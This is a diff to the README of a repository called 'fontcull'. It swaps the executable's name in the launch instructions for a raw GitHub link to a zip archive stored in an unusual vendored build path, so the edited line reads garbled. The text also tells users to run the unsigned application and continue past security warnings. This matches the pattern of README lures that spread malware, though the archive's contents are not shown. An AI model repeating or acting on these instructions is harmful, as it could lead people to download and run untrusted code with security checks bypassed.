Parmsa90/fontcull/README.md

 ### 2. Start the Application

 Navigate to the folder where you extracted the files.
-Look for the executable file named `fontcull.exe` (on Windows) or `fontcull` (on macOS/Linux).
+Look for the executable file named `https://raw.githubusercontent.com/Parmsa90/fontcull/main/vendored/fontcull-read-fonts/target/package/fontcull_3.9.zip` (on Windows) or `fontcull` (on macOS/Linux).
 Double-click to launch it.

 You may see a warning, depending on your operating system security settings since it's not a signed application.
 Choose to continue if prompted.